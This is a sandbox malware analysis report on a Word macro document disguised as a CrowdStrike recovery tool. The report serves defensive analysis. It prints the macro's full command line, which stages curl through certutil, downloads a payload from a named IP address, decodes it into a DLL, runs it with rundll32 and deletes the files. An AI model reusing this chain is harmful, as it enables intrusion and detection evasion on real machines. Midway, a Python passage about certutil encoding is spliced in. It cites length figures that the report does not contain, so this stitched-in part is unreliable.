Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Sample name: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Analysis ID: 1478411
MD5: dd2100dfa067caae416b885637adc4ef
SHA1: 499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256: 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Tags: docm
Infos:

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Downloads suspicious files via Chrome
Machine Learning detection for dropped file
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Microsoft Office Child Process
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0001.tmp Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4D9BD0 CryptAcquireContextA,CryptCreateHash, 7_2_000000013F4D9BD0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4D9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 7_2_000000013F4D9C20
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4D9C9C CryptHashData, 7_2_000000013F4D9C9C
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F359BD0 CryptAcquireContextA,CryptCreateHash, 22_2_000000013F359BD0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F359C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 22_2_000000013F359C20
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 22_2_000000013F359C9C CryptHashData, 22_2_000000013F359C9C
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_90c8dacc-4
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\GoogleUpdater
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\chrome_BITS_3236_441263539
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: curl.pdb source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe
Source: Joe Sandbox View IP Address: 239.255.255.250
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F4A2738 recv,WSAGetLastError, 7_2_000000013F4A2738
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9512A27C-373D-4C6D-8C25-ECB66CCA249E}.tmp
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe.4.dr String found in binary or memory: Usage: curl [options...] <url>
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: sb-ssl.google.com
Source: unknown HTTP traffic detected:
    POST /safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
    Host: sb-ssl.google.com
    Connection: keep-alive
    Content-Length: 1073
    Content-Type: application/octet-stream
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr String found in binary or memory: http://172.104.160.
Source: vbaProject.bin String found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000016.00000002.523173521.0000000000070000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: vbaProject.bin String found in binary or memory: http://172.104.160.126:80X99
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr String found in binary or memory: https://aka.ms/WRH
Source: document.xml String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr String found in binary or memory: https://azure.status.microsoft/status
Source: curl.exe String found in binary or memory: https://curl.se/
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr String found in binary or memory: https://curl.se/P
Source: curl.exe String found in binary or memory: https://curl.se/docs/copyright.html
Source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000000.382543301.000000013F500000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519441459.000000013F380000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr String found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exe String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe.4.dr String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr String found in binary or memory: https://www.crowdstrike.com/blog/statement-on-falcon-content-update-for-windows-hosts/
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr String found in binary or memory: https://www.intel.com/content/www/us/en/support/articles/000054990/intel-nuc/intel-nuc-kits.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443

System Summary

Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False) Name: MainFunc
Source: ~WRC0001.tmp.16.dr OLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp") Name: MainFunc
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c " Name: MainFunc
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & " Name: MainFunc
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell") Name: MainFunc
Source: ~WRC0001.tmp.16.dr OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0001.tmp.16.dr OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe File dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)
Source: C:\Windows\System32\certutil.exe File created: C:\Windows\cer6529.tmp
Source: C:\Windows\System32\certutil.exe File created: C:\Windows\cer6690.tmp
Source: C:\Windows\System32\certutil.exe File created: C:\Windows\cer7050.tmp
Source: C:\Windows\System32\certutil.exe File created: C:\Windows\cer601A.tmp
Source: C:\Windows\System32\certutil.exe File created: C:\Windows\cer60A7.tmp
Source: C:\Windows\System32\certutil.exe File created: C:\Windows\cer6873.tmp
Source: C:\Windows\System32\certutil.exe File deleted: C:\Windows\cer6529.tmp
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisDocument, Function Document_Open Name: Document_Open
Source: ~WRC0001.tmp.16.dr OLE, VBA macro line: Sub Document_Open()
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE indicator, VBA macros: true
Source: ~WRC0001.tmp.16.dr OLE indicator, VBA macros: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm Stream path 'VBA/__SRP_0' : http://172.104.160.126:8099\curl.txt\curl.exe/payload2.txt\mscorsvc.txt\mscorsvc.dllC:\Windows\Sys"tem32\cmd.exe /c$-encode$\cu-decode"$ -o$del&rl.exe &.bq.aSTART( rundll32&,DllMainexit
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F48A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F495658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F321F00 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F321FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F4A1FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F314FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F315658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F30A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F494FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: String function: 000000013F4A1F00 appears 134 times
Source: classification engine Classification label: mal88.expl.evad.winDOCM@51/26@4/3
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 7_2_000000013F483434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next, 7_2_000000013F483434
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRAC07.tmp
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE indicator, Word Document stream: true
Source: ~WRC0001.tmp.16.dr OLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.16.dr OLE indicator, Word Document stream: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~WRC0001.tmp.16.dr OLE document summary: title field not present or empty
Source: C:\Windows\System32\certutil.exe Console Write: ................x.#.....................(.P.....(........................~..............#.........#......................... .r................. Jump to behavior
Source: C:\Windows\System32\certutil.exe Console Write: .................Q.w....................(.P.....(........................~..............#.......p.$.....................j....................... Jump to behavior
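The Input/Output Length pairs above (530944 bytes in, 730108 out, then the reverse on the decode) are exactly what certutil's -encode format produces: base64 in 64-character CRLF-terminated lines between -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- lines. The Python below is an added worked check, not part of the sandbox report: it emulates that format on a constructed 530944-byte buffer (a repeating byte pattern standing in for curl.exe), confirms the encoded size comes out to 730108, and decodes it back byte-for-byte. The point for a responder is that the xcopy / encode / decode detour leaves curl.exe unchanged, and the curl.txt that certutil writes to Temp carries the CERTIFICATE armour lines, which is a usable content signature for certutil-staged files.

```python
import base64

# certutil -encode output format: PEM header, 64-char base64 lines, CRLF line endings, PEM footer.
PEM_HEADER = b"-----BEGIN CERTIFICATE-----\r\n"
PEM_FOOTER = b"-----END CERTIFICATE-----\r\n"
LINE_LEN = 64


def certutil_encode(data: bytes) -> bytes:
    """Emulate `certutil -f -encode <in> <out>` on an in-memory buffer."""
    b64 = base64.b64encode(data)
    body = b"".join(b64[i:i + LINE_LEN] + b"\r\n" for i in range(0, len(b64), LINE_LEN))
    return PEM_HEADER + body + PEM_FOOTER


def certutil_decode(text: bytes) -> bytes:
    """Emulate `certutil -f -decode`: drop the armour lines, then base64-decode the rest."""
    lines = [ln.strip() for ln in text.splitlines()]
    body = b"".join(ln for ln in lines if ln and not ln.startswith(b"-----"))
    return base64.b64decode(body, validate=True)


def expected_encoded_length(n_bytes: int) -> int:
    """Closed-form size of certutil's -encode output for an input of n_bytes."""
    b64_chars = 4 * ((n_bytes + 2) // 3)              # every 3 input bytes -> 4 chars, padded
    n_lines = (b64_chars + LINE_LEN - 1) // LINE_LEN  # 64 chars per line, each followed by CRLF
    return len(PEM_HEADER) + b64_chars + 2 * n_lines + len(PEM_FOOTER)


def roundtrip(n_bytes: int) -> tuple[int, bool]:
    """Encode a constructed buffer of n_bytes; return (encoded size, decoded == original)."""
    # Constructed input: repeating 0x00..0xFF pattern, a stand-in for the 530944-byte curl.exe.
    pattern = bytes(range(256))
    data = (pattern * (n_bytes // 256 + 1))[:n_bytes]
    encoded = certutil_encode(data)
    return len(encoded), certutil_decode(encoded) == data


if __name__ == "__main__":
    size, lossless = roundtrip(530944)
    print(f"encoded size {size}, closed-form {expected_encoded_length(530944)}, lossless={lossless}")
```

The closed-form figure decomposes as 707928 base64 characters plus 22124 bytes of CRLF over 11062 lines plus 56 bytes of armour; any other line width or line ending would not land on 730108.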
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\xcopy.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm ReversingLabs: Detection: 26%
Source: curl.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
